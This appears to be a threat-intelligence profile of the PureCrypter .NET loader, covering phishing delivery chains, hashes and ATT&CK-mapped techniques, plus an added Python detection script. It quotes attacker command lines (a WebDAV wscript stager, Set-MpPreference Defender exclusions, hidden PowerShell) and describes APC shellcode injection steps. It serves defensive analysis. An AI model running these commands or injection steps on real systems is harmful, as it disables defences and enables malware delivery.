PureCrypter
PureCrypter is a commercial .NET crypter/loader associated with the PureCoder malware-as-a-service ecosystem and used as an obfuscation and delivery layer for other malware. Across the provided reporting, it is described as a .NET-based executable, commonly obfuscated with SmartAssembly or ConfuserEx, that decrypts embedded resources, decompresses them, loads the resulting .NET assembly in memory via Assembly.Load, and invokes it through reflection. Multiple analyses specifically describe PureCrypter as a .NET 3DES loader using 3DES-CBC with PKCS7 padding, followed by GZip decompression of an embedded payload and reflective execution. It has been observed as a secondary dropper/resource loader carrying additional encrypted inner payloads and deploying final malware families including PureLogs, Agent Tesla, RedLine, DarkTrack RAT, Remcos, and other RATs and stealers.
Observed delivery chains show PureCrypter used in multi-stage intrusions and phishing campaigns. In BI.ZONE reporting on Fluffy Wolf activity targeting Russian companies from March to May 2026, phishing emails delivered archives directly or via GitHub links; a C++ loader named PowerLoader launched hidden PowerShell, retrieved scripts from a command server, then downloaded and executed PureCrypter to deploy the final payload. In SERPENTINE#CLOUD activity targeting German-speaking victims with fake DATEV invoice lures, staging used Cloudflare trycloudflare.com tunnels, WSH/WSF/BAT scripts, downloaded Python runtimes, Donut shellcode, and Early Bird APC injection into explorer.exe before launching two PureCrypter samples. Those PureCrypter instances were described as .NET resource loaders carrying additional encrypted inner payloads. Broader SERPENTINE#CLOUD reporting also places PureCrypter in a recurring chain of batch stager -> Python loader -> Donut shellcode -> PureCrypter -> inner RAT.
Technical behavior directly mentioned in the content includes sending a TLS 1.2-encrypted infection message via Discord webhook and executing Set-MpPreference -ExclusionPath to exclude files or folders from Microsoft Defender scans. In recovered loader samples from SERPENTINE#CLOUD, PureCrypter loaders were PE32 .NET x86 binaries targeting CLR v4.0.30319, with embedded resource names such as Jaglt and Ctjady, silent exception handling, and reflection targets that varied by builder version. The Sep/Oct05 loader sample Fviwknzr.exe had SHA-256 dcd22d338a0bc4cf615d126b84dfcda149a34cf18bc43b85f16142dfb019e608; Nov loader samples Erqcke.exe had SHA-256 0ab09a4787ea9cb259cadd3f811a56f7bd0058287634bbaf0388b2cd40464505 and b1c6659ee4ee35540f5ed043b611ac88a7fce9dc2f564168e7d47c43683163f6. Reported inner payloads delivered by these loaders included Qdjlj.dll (SHA-256 cdf87d68885caa3e94713ded9dd5e51c39b7bc7ef9bf7d63a4ff5ab917a96b36), described as a PureLogs credential/crypto-stealing build, and Mvfsxog.dll (SHA-256 046d0e83c1e6dcaf526127b81b962042e495f5ae3a748f3a9452be62f905acf8), described as a PureLogs plugin stager.
The malware is repeatedly associated with financially motivated intrusion sets and commodity malware delivery operations rather than a single exclusive actor. Reported users or linked campaigns include Fluffy Wolf, the SERPENTINE#CLOUD cluster, and other operators using PureCoder tooling. Targeting mentioned in the content includes Russian companies in construction, consulting, engineering, retail, e-commerce, and industrial sectors, as well as German-speaking businesses targeted with invoice-themed lures. The content also notes PureCrypter pricing in MaaS contexts, including an annual subscription price of about USD 449 in one report and a one-month subscription price of USD 59 in earlier reporting.
Groups observed using it
5 distinct threat actors attributed by public researchers.
The malware then downloads and launches PureCrypter, which in turn deploys the final payload.
Its tooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”...
PureCrypter malware has been observed distributing multiple RATs and information stealers. It is a .NET-based executable, obfuscated with SmartAssembly...
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development: Web Services: Cloudflare Tunnels T1583.006 1–6 Free Quick Tunnel, no account required
Initial Access
2 techniques
The messages came with "reconciliation statements", "claims" and other documents attached, which in reality turned out to be archives containing malware. Sometimes the attachment was attached directly...
...while in other cases the victim was given a link to a GitHub repository from which a RAR archive was downloaded. According to the researchers, Fluffy Wolf makes active use of GitHub because such links look legitimate and help bypass email filters...
Execution
7 techniques
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The batch stagers are the initial execution layer. 29 .bat files recovered across six evidence directories deduplicate to 13 unique templates in four categories.
wscript.exe //B \\tunnel1\DavWWWRoot\dat.wsh └─> Cross-tunnel redirect to \\tunnel2\DavWWWRoot\dat.wsf
The ZIP contains a Python runtime and one or more loader scripts. Each loader decrypts embedded shellcode, and that shellcode bootstraps the .NET Common Language Runtime (CLR) to load the actual payload.
allocate RWX memory, write shellcode via WriteProcessMemory ... ctypes.windll.kernel32.VirtualProtect(... 0x40, # PAGE_EXECUTE_READWRITE ... )
Victim clicks "DATEV-Rechnung Nr. 69928142421.pdf.lnk"
Persistence
2 techniques
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or batch files in the Windows Startup folder.
Privilege Escalation
4 techniques
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
Stealth
10 techniques
The content repeatedly describes adversaries using Base64, XOR, RC4, AES, hexadecimal encoding, string encryption, code flattening, custom crypters, and other obfuscation methods to hide payloads, strings, configuration data, URLs, and scripts.
Mosquito’s installer is obfuscated with a custom crypter. PureCrypter has used SmartAssembly and .NET Reactor for string encryption and control flow obfuscation. PyDCrypt has been compiled and encrypted with PyInstaller using the --key flag.
Obfuscated Files: Encrypted Payload T1027.013 Multi-layer XOR + Chaskey CTR + AES
Masquerading: Match Legitimate Name T1036.005 DATEV invoice filename
The content repeatedly describes adversaries and malware deleting files, directories, droppers, scripts, logs, archives, staged data, and other artifacts from compromised systems, e.g., 'APT29 has used SDelete to remove artifacts from victim networks' and 'Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim.'
After patching, Donut loads mscoree.dll , calls CLRCreateInstance to start the .NET CLR (v4.0.30319), and invokes ExecuteInDefaultAppDomain with the target class and method names stored in the instance.
Donut is the bridge between the Python shellcode and .NET. Every wave uses it. The framework packages .NET assemblies as position-independent shellcode that bootstraps the CLR from scratch.
Command and Control
5 techniques
C2 Application Layer Protocol: Web Protocols T1071.001 1–6 WebDAV over HTTPS for staging
Proxy: External Proxy T1090.002 Cloudflare tunnel for staging
This tool is written in C++ and launches PowerShell in hidden mode, retrieving scripts from a command-and-control server. The malware then downloads and launches PureCrypter, which in turn deploys the final payload.
The content repeatedly describes malware and threat actors using SSL, TLS, HTTPS, RSA, AES, Blowfish, RC4, ECIES, Diffie-Hellman, OpenSSL, WolfSSL, and mutual TLS to protect command and control traffic.
All tunnels use Cloudflare's free Quick Tunnel service ( trycloudflare.com ). The origin server IP is never exposed — all traffic proxies through Cloudflare's anycast network
Other
3 techniques
Defense Evasion Subvert Trust Controls: AMSI Bypass T1562.001 1, 3 Donut AMSI patch + DcRat runtime AMSI patch
The content repeatedly describes threat actors and malware disabling or modifying security tools, EDR/AV, logging, firewall rules, integrity checkers, and security settings; e.g., 'Agrius used several mechanisms to try to disable security tools' and 'BlackByte disabled security tools such as Windows Defender and the Raccine anti-ransomware tool during operations.'
BlackByte Ransomware 'adds .JS and .EXE extensions to the Microsoft Defender exclusion list'; PureCrypter 'executed Set-MpPreference -ExclusionPath'; QakBot 'modify the Registry to add its binaries to the Windows Defender exclusion list'; Raspberry Robin 'add an exception to Microsoft Defender that excludes the entire main drive'; StrongPity 'add directories used by the malware to the Windows Defender exclusions list'; XLoader 'can add the path of its executable to the Microsoft Defender exclusion list'; ZIPLINE 'can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool.'
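A defender-side triage of the behaviours listed above (Defender exclusion changes via Set-/Add-MpPreference, WebDAV UNC staging through DavWWWRoot, trycloudflare.com Quick Tunnels, hidden PowerShell), as an added example that is not part of the original page or of any vendor's tooling; the telemetry lines and their "source|data" layout are constructed for illustration, and the technique IDs are the ATT&CK IDs the page cites plus T1059.001 for PowerShell.

```python
import re

# Constructed sample telemetry (not the page's samples): "source|data" records
# approximating PowerShell script-block, process-creation and DNS-query logging.
SAMPLE_EVENTS = [
    "ps_scriptblock|Set-MpPreference -ExclusionPath 'C:\\Users\\Public\\stage'",
    "ps_scriptblock|Get-Process | Where-Object { $_.CPU -gt 100 }",
    "proc_create|wscript.exe //B \\\\tunnel1\\DavWWWRoot\\dat.wsh",
    "proc_create|notepad.exe C:\\notes.txt",
    "dns_query|abc-def-ghi.trycloudflare.com",
    "dns_query|update.microsoft.com",
    "proc_create|powershell.exe -w hidden -c Add-MpPreference -ExclusionPath C:\\ProgramData",
]

# (rule name, ATT&CK technique, regex applied to the data field)
RULES = [
    ("defender_exclusion", "T1562.001",
     r"(?i)\b(Set|Add)-MpPreference\b.*-Exclusion(Path|Extension|Process)"),
    ("webdav_unc_stager", "T1071.001",
     r"(?i)\\\\[^\\\s]+\\DavWWWRoot\\"),          # \\host\DavWWWRoot\...
    ("trycloudflare_tunnel", "T1090.002",
     r"(?i)(^|\.)trycloudflare\.com$"),             # free Quick Tunnel hostnames
    ("hidden_powershell", "T1059.001",
     r"(?i)\bpowershell(\.exe)?\b.*\s-w(indowstyle)?\s+hidden\b"),
]


def classify(event):
    """Return the names of every rule matching one telemetry record."""
    _source, _, data = event.partition("|")
    return [name for name, _tid, pattern in RULES if re.search(pattern, data)]


def triage(events):
    """Return (event, [(rule, technique), ...]) for every record with at least one hit."""
    findings = []
    for ev in events:
        hits = classify(ev)
        if hits:
            techniques = [(name, tid) for name, tid, _p in RULES if name in hits]
            findings.append((ev, techniques))
    return findings


if __name__ == "__main__":
    for ev, techniques in triage(SAMPLE_EVENTS):
        print(ev, "->", techniques)
```

Any hit on the Defender exclusion rule deserves review on its own; the other three are most meaningful when they co-occur on one host, which is the staging chain the page describes.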
IOCs tracked for this family
36 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
26 sources tracked across advisories, community write-ups, and news.
A crypter/loader that deploys the final payload after PowerLoader runs.
Mentioned only as related malware/reporting in the see-also section, without operational details in the main content.
A crypter/loader component used in an older PureRAT campaign build to protect and load the payload in memory.
Loader/crypter used in Wave 1 as a dropper for additional encrypted inner payloads.